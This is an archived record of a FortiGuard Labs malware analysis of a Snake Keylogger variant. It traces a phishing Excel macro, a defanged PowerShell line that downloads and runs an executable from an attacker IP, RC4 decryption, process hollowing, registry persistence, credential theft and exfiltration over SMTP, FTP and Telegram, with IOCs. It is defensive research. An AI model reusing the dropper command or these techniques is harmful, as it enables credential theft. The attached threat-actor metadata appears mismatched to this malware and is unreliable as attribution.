{
	"id": "146164d9-4ec9-4129-af42-3ec7ea2db4f8",
	"created_at": "2026-04-06T00:12:35.919899Z",
	"updated_at": "2026-04-10T03:37:08.797603Z",
	"deleted_at": null,
	"sha1_hash": "e7f677026f6155277a396b384435242a7fcc20a8",
	"title": "Deep Dive into a Fresh Variant of Snake Keylogger Malware | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3182796,
	"plain_text": "Deep Dive into a Fresh Variant of Snake Keylogger Malware | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2021-11-04 · Archived: 2026-04-05 21:32:20 UTC\r\nFortinet’s FortiGuard Labs recently captured a Microsoft Excel sample from the wild that was used to spread malware. After researching its behaviors, I recognized it as a fresh variant of the Snake Keylogger malware.\r\nSnake Keylogger is malware developed in .NET. It first appeared in late 2020 and focuses on stealing sensitive information from a victim’s device, including saved credentials, the victim’s keystrokes, screenshots of the victim’s screen, and clipboard data.\r\nIn July 2021, Snake Keylogger entered a top 10 malware families report for the first time, meaning that the Snake Keylogger family is increasing its influence and impacting more people’s devices and sensitive data.\r\nIn this threat research blog you will learn how the Snake Keylogger variant is downloaded and executed through a captured Excel sample, what techniques this variant uses to protect itself from analysis, what sensitive information it steals from a victim’s machine, and how it submits that collected data to the attacker.\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows Users\r\nImpact: Collects sensitive information from victims’ devices\r\nSeverity level: Critical\r\nWhat the Captured Microsoft Excel Sample Looks Like\r\nThis Excel sample, delivered as an attachment in a phishing email, contains malicious VBA macro code. Figure 1.1 shows a screenshot of the file when it is opened. It displays a blurred picture of a document and asks the victim to click the yellow button to get a clearer image.\r\nhttps://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\r\nPage 1 of 17\r\nFigure 1.1 – The Excel file content when it is opened\r\nOnce the yellow “Enable Content” button is clicked by the victim, the malicious VBA code is executed in the background. The macro project that contains the malicious VBA code is password protected so that it cannot be viewed by an analyst. However, we were able to modify its binary file to remove this restriction.\r\nGoing through its code, a “Workbook_Activate()” method is automatically called when the document is opened. It writes a piece of PowerShell code from a local variable into a BAT file. Figure 1.2 shows partial VBA code of this method, where variable “s” holds the PowerShell code and \"Gqyztfbtsogpnruooqr.bat\" is the BAT file, which is finally executed by calling “x = Shell(bat, 0)”.\r\nFigure 1.2 – Macro VBA code executed in background\r\nThe bottom of Figure 1.2 shows the content of variable “s”, which contains the base64-encoded PowerShell code that is decoded by PowerShell.exe when it is executed.\r\nBelow is the base64-decoded PowerShell code:\r\n$ProcName = \"Wheahmnfpgaqse.exe\";\r\n(New-Object System.Net.WebClient).DownloadFile(\"hxxp[:]//3[.]64[.]251[.]139/v3/2/Requests07520000652.exe\",\"$env:APPDATA\\$ProcName\")\r\nStart-Process (\"$env:APPDATA\\$ProcName\")\r\nThe PowerShell code is very simple. It downloads a file (“Requests07520000652.exe”) onto the victim’s device, saving it as “%AppData%\\Wheahmnfpgaqse.exe” by calling “DownloadFile()”, and then executes it by calling “Start-Process()”.\r\nSnake Keylogger Downloader\r\nAfter some research, I learned that the file \"Wheahmnfpgaqse.exe\" is a downloader for Snake Keylogger, written in .NET. When it starts, it sleeps for 21 seconds to bypass sandboxes that kill a sample process when a no-activity timeout is triggered.\r\nFigure 2.1 – Downloads \u0026 decrypts Snake Keylogger module after a sleep\r\nTwenty-one seconds later, the downloader invokes a function called “Consturctor()”, as you can see in Figure 2.1. It then invokes another function, “Program.List_Types()”, which downloads the Snake Keylogger module from the link “hxxps[:]//store2[.]gofile[.]io/download/0283e6ba-afc6-4dcb-b2f4-3173d666e2c4/Huzeigtmvaplpinhoo.dll”; this is an RC4-encrypted DLL file. Next, it calls the “ToRc()” function to RC4-decrypt it using the key \"Dllzjn\".\r\nIt then loads the decrypted DLL module (a .NET DLL called “Huzeigtmvaplpinhoo.dll”) and enumerates its exported functions to find \"G6doICqoMU()\", which is invoked by executing “type.InvokeMember(\\\"G6doICqoMU\\\", BindingFlags.InvokeMethod, null, null, null)” in Consturctor(), as shown in Figure 2.1. The decrypted .NET DLL is the dropper and installer of Snake Keylogger.\r\nLet’s dive into this module to see how it performs its tasks.\r\nSnake Keylogger Installer\r\nAccording to my analysis, the decrypted DLL module (“Huzeigtmvaplpinhoo.dll”) deploys Snake Keylogger onto the victim’s device and sets it up as an auto-run program. It extracts an executable PE file into memory from its Resource directory and then performs process hollowing, which injects the executable into a newly created child process and executes it.\r\nI will explain in detail how it performs these functions in this section.\r\n1. Persistence Mechanism\r\nFigure 3.1 – Breaks on the export function “G6doICqoMU()” in the debugger dnSpy\r\nFigure 3.1 shows an outline of the decrypted DLL module (“Huzeigtmvaplpinhoo.dll”). As you can see, to hinder analysis the file is obfuscated so that the class names, function names, and variable names are all randomly generated, meaningless strings. This creates trouble for analysts.\r\nThe full name of the export function “G6doICqoMU()” is “Huzeigtmvaplpinhoo!pXfqpio3clcAoFxTnfJ.CORFgLoyRGlurYwdwIh.G6doICqoMU()”. Again, for the same reason as before, it sleeps for 35 seconds at the beginning of this function to bypass some malware analysis systems.\r\nNext, it works to make Snake Keylogger persistent on the infected Windows system. A Windows system has a “Startup” folder inside the “Start Menu”; the programs inside this folder are started when Windows starts. The full path to this folder is defined in the system registry by the string values “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup” and “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup”. The value data of “Startup” is “C:\\Users\\{UserName}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup” by default.\r\nThis variant of Snake Keylogger changes both “Startup” values to other folders. Figure 3.2 shows the code changing the Windows startup folder to “C:\\Users\\M0YTes0Env\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\chsg\\” by calling the API SetValue(). In the bottom half of Figure 3.2 you can see the content of the system registry path, value name, and new value data.\r\nFigure 3.2 – Change Windows “Startup” folder to a new path\r\n“chsg” is a new folder created by Snake Keylogger. The program copies the Snake Keylogger file (the downloaded \"Wheahmnfpgaqse.exe\") into this folder and renames it “sgosr.exe”. This ensures that Snake Keylogger is started by Windows every time the system starts.\r\n2. Extraction from Resource\r\nAlthough the content of Huzeigtmvaplpinhoo.dll only ever appears in memory, I saved it to a local file to analyze it. It has several resources in its Resource directory, as shown in Figure 3.3.\r\nFigure 3.3 – Resource directory display of Huzeigtmvaplpinhoo.dll\r\nThe process of extracting the Snake Keylogger payload file is a little complicated. It uses a tricky way to load the resource. It has a local callback function, defined by ResolveEventHandler, that is registered to AppDomain.ResourceResolve; this callback is invoked when loading a resource by name fails. It resembles an exception handler in the Windows SEH strategy. In addition, it has another local callback function registered to AppDomain.AssemblyResolve, which is called when loading an assembly (i.e., a module) by name fails.\r\nBelow is pseudocode for registering the local resource resolver, where T9wOjU5ccxTJaVfUntn.Osc50oil0l is the local callback function.\r\nAppDomain.ResourceResolve += new ResolveEventHandler(T9wOjU5ccxTJaVfUntn.Osc50oil0l)\r\nNow, let’s see how Snake Keylogger uses this: it deliberately loads a nonexistent resource, which triggers the resource loading failure. It attempts to read a resource named \"Qkxkikeg\" from the current module, which has no resource of that name in its Resource directory, as you can see in Figure 3.3. A resource loading failure occurs and the registered local ResolveEventHandler function is called to handle this error. This in turn causes an assembly loading failure, and the assembly resolve callback function is called.\r\nA while later, another PE file, decrypted from the resource “{d977ee8c-85ce-4731-b9a1-323ba88c6eeb}”, appears in memory. It contains a resource named “Qkxkikeg”, the originally requested resource name, as shown in Figure 3.4.\r\nFigure 3.4 – “Qkxkikeg” resource is in another module\r\nThe Snake Keylogger payload is simply GZIP-compressed data in the resource “Qkxkikeg” under the Resource directory “ClassLibrary1.Properties.Resources”.\r\nFigure 3.5 displays the GZIP data of the resource “Qkxkikeg” (reversed) on the left and the decompressed Snake Keylogger on the right.\r\nFigure 3.5 – Compressed and decompressed data of “Qkxkikeg”\r\n3. Process Hollowing\r\nThe program then creates a suspended child process and deploys the Snake Keylogger payload into the child process. It then resumes the child process to run it. Meanwhile, the parent process exits by calling Environment.Exit(0).\r\nFigure 3.6 – Create a suspended child process\r\nAccording to the code in Figure 3.6, it calls the API CreateProcess() to create the child process with creation flags 134217732U (0x8000004), which means CREATE_NO_WINDOW and CREATE_SUSPENDED.\r\nIt then calls the API WriteProcessMemory() to copy the Snake Keylogger payload into the child process, section by section. Next, it calls SetThreadContext() to point the child process’s main thread at the entry point of Snake Keylogger. Before the parent process exits, ResumeThread() is called to let the child process run.\r\nSnake Keylogger Payload\r\nFigure 4.1 – Fully obfuscated Snake Keylogger payload\r\nThe code of the Snake Keylogger payload file is fully obfuscated, as shown in Figure 4.1, to hinder analysis. The class and function names are unreadable.\r\nTherefore, to better analyze and explain its code and intent, I deobfuscated the payload file using the tool “de4dot”. This made its code more readable, and my analysis is based on that result.\r\nGoing through the Snake Keylogger code, I found that it provides features such as recording the victim’s keystrokes (the keylogger), stealing data from the system clipboard, taking screenshots of the victim’s screen, and stealing saved credentials from specific software clients installed on the victim’s device.\r\n1. Keylogger Feature\r\nFigure 4.2 shows a code snippet of setting up the keylogger.\r\nFigure 4.2 – Initialization of Keylogger\r\nIt calls the API SetWindowsHookExA() to register a hook callback function (this.callback_ProcessKey()) to monitor low-level keyboard input events. The first parameter is the hook type, where “13” indicates WH_KEYBOARD_LL.\r\nAfter that, the callback function is called by Windows whenever the victim types, so it is able to handle and record the keystrokes into a global string variable. It also records the foreground window title, to identify where the victim is typing, by calling the APIs GetForegroundWindow() and GetWindowText().\r\nIt also has a Timer (Timer0) that periodically sends the keylogger data to the attacker.\r\n2. Screenshot\r\nIt is able to take screenshots of the victim’s device. It has a Timer (Timer1) that captures the victim’s screen from time to time by calling the API CopyFromScreen(). It saves the screenshot to a local Screenshot.png file in the system’s “MyDocuments” folder and sends this picture file to the attacker.\r\n3. System Clipboard\r\nIt has two Timers. One (Timer2) is used to collect system clipboard data by calling Clipboard.GetText() and save it to a global variable. The other (Timer3) is used to send the collected clipboard data to the attacker.\r\nFigure 4.3 – Timer function to obtain system clipboard data\r\nFigure 4.3 shows the Timer function used to obtain system clipboard data. Every time it fires, it checks whether the current clipboard data has already been collected in the global variable main_cls.string_clipboard_data. If not, it appends the current clipboard data to the global variable.\r\n4. Steal Credentials\r\nBased on my analysis, this variant’s main work is stealing credentials from the victim’s device. It implements credential stealing in the Main() function, as shown in Figure 4.4 below.\r\nFigure 4.4 – Main() with functions to steal credentials and submit them\r\nThis is the deobfuscated Main() function, showing the functions used to steal credentials from various clients. The function at the bottom submits the stolen credentials. These functions obtain the saved credentials of each application from the different places where they are stored, including local files (like Chrome) and the system registry (like Outlook).\r\nI will now use Outlook as an example to explain how Snake Keylogger collects credentials.\r\nFigure 4.5 is a screenshot of the function that reads Microsoft Outlook credentials from the system registry. It goes through four registry paths for different Outlook versions to read out (if present) “Email”, one of \"IMAP Password\", \"POP3 Password\", \"HTTP Password\" or \"SMTP Password\", and “SMTP Server”.\r\nFigure 4.5 – Function to collect saved credentials for Microsoft Outlook\r\nBelow is an example showing what credential information Snake Keylogger can collect from Microsoft Outlook:\r\n-------- Snake Keylogger --------\r\nFound From: Outlook\r\nURL: smtp.gmail.com\r\nE-Mail: victim_email@gmail.com\r\nPSWD: {Password}\r\n---------------------------------\r\nI have categorized the clients that Snake Keylogger targets as below:\r\nWeb Browsers:\r\nGoogle Chrome, Mozilla Firefox, Mozilla SeaMonkey Browser, Mozilla IceCat Browser, Yandex Browser, Microsoft Edge, Amigo Browser, Nichrome Browser, QQBrowser, Coccoc Browser, Orbitum Browser, Slimjet Browser, Iridium Browser, Vivaldi Browser, Iron Browser, Ghost Browser, Cent Browser, Xvast Browser, Chedot Browser, SuperBird Browser, 360 Browser, 360 Secure Browser, Comodo Dragon Browser, Brave-Browser, Torch Browser, UC Browser, Blisk Browser, Epic Privacy Browser, Opera Web Browser, Liebao Browser, Avast Browser, Kinza Browser, BlackHawk Browser, Citrio Browser, Uran Browser, Coowon Browser, 7 Star Browser, QIP Surf Browser, Sleipnir Browser, Chrome Canary Browser, CoolNovo Browser, SalamWeb Browser, Sputnik Browser Extension, Falkon Browser, Elements Browser, Slim Browser, Ice Dragon Browser, CyberFox Browser, PaleMoon Browser, Waterfox Browser, Kometa Browser and various browsers designed based on the Chromium project.\r\nEmail Clients:\r\nMicrosoft OutLook, Tencent Foxmail, Mozilla Thunderbird and Postbox.\r\nOther Clients:\r\nFileZilla, Pidgin and Discord.\r\nSending the Stolen Data to the Attacker\r\nPer the code of this variant of Snake Keylogger, it sends an email to the attacker (using the SMTP protocol) to submit the victim’s stolen credential data.\r\nSnake Keylogger collects basic information about the victim’s Windows system, such as the user name, PC name, system date and time, public IP address, and country, which is placed in the header of the collected credentials.\r\nFigure 5.1 – Craft email with stolen credentials\r\nFigure 5.1 shows the crafting of the email with stolen credentials to be sent to the attacker. At the bottom are the email’s Subject and Body. The stolen credentials are put in two attachments, “Passwords.txt” and “User.txt”. Figure 5.2 is a screenshot of “Password.txt” attached to the email sent to the attacker, with basic information and credentials stolen from my test Windows system.\r\nFigure 5.2 – Example of “Password.txt”\r\nTo send stolen data to the attacker, it defines variables containing the sender’s email address, password, SMTP server address, and SMTP port, as shown in Figure 5.3. It defines these variables in the class’s constructor.\r\nFigure 5.3 – The attacker’s email address is hard-coded in the constructor function\r\nBesides sending data via email, this Snake Keylogger variant also offers FTP and Telegram methods to submit collected sensitive data to the attacker.\r\nFor FTP, the attacker needs to set up an FTP server and configure Snake Keylogger with the server’s address and credentials so that it can upload the stolen data.\r\nFor Telegram, Snake Keylogger uses the “sendDocument” method of the Telegram Bot API to submit its stolen data to the Telegram account that the attacker provides. Refer to Figure 5.4 for more information about the Telegram method.\r\nFigure 5.4 – Partial code of submitting data using Telegram\r\nConclusion on Snake Keylogger Malware\r\nTo better understand the entire process of this malware, I drew a flow chart, Figure 6.1, that outlines the main steps explained in this analysis.\r\nFigure 6.1 – The flow chart of the variant of Snake Keylogger\r\nAt the beginning of this analysis, we went through how a malicious macro inside an Excel document executes PowerShell that downloads the Snake Keylogger downloader.\r\nNext, I focused on how the Snake Keylogger installer establishes persistence on the victim's device and the complicated, tricky way it extracts the Snake Keylogger payload.\r\nI then elaborated on the features this variant of Snake Keylogger offers, such as recording keystrokes and collecting credentials, clipboard data, and screenshots.\r\nFinally, I explained how the collected data is submitted to the attacker via email, as well as by two other methods: FTP and Telegram.\r\nFortinet Protections\r\nFortinet customers are already protected from this malware by FortiGuard’s Web Filtering, AntiVirus, FortiEDR, and CDR (content disarm and reconstruction) services, as follows:\r\nThe malicious macro inside the Excel sample can be disarmed by the FortiGuard CDR (content disarm and reconstruction) service.\r\nAll relevant URLs have been rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe original Excel sample and the Snake Keylogger downloader files are detected as \"VBA/SnakeKeylogger.84D0!tr\" and \"MSIL/SnakeKeylogger.ADFA!tr\" and are blocked by the FortiGuard AntiVirus service.\r\nFortiEDR detects the downloaded executable file as malicious based on its behavior.\r\nFortiMail protects Fortinet customers by blocking phishing emails.\r\nWe also suggest that readers go through the free NSE training: NSE 1 – Information Security Awareness, which has a module on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIOCs\r\nURLs:\r\n\"hxxp[:]//3[.]64[.]251[.]139/v3/2/Requests07520000652.exe\"\r\n\"hxxps[:]//store2[.]gofile[.]io/download/0283e6ba-afc6-4dcb-b2f4-3173d666e2c4/Huzeigtmvaplpinhoo.dll\"\r\nSample SHA-256:\r\n[SOA# 1769.xlsm]\r\n3B437BAA9A07E9DECE2659F20B5D97F8F729BA077D399933041CDC656C8D4D04\r\n[Requests07520000652.exe or Wheahmnfpgaqse.exe]\r\n53D520C1F12FE4E479C6E31626F7D4ABA5A65D107C1A13401380EBCA7CCA5B05\r\nReferences:\r\nhttps://blog.checkpoint.com/2021/08/12/july-2021s-most-wanted-malware-snake-keylogger-enters-top-10-for-first-time/\r\nhttps://docs.microsoft.com/en-us/dotnet/api/system.appdomain.assemblyresolve?view=net-5.0\r\nhttps://docs.microsoft.com/en-us/dotnet/api/system.appdomain.resourceresolve?view=net-5.0\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security Subscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda (TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans program.\r\nSource: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware"
	],
	"report_names": [
		"deep-dive-into-a-fresh-variant-of-snake-keylogger-malware"
	],
	"threat_actors": [
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434355,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e7f677026f6155277a396b384435242a7fcc20a8.pdf",
		"text": "https://archive.orkl.eu/e7f677026f6155277a396b384435242a7fcc20a8.txt",
		"img": "https://archive.orkl.eu/e7f677026f6155277a396b384435242a7fcc20a8.jpg"
	}
}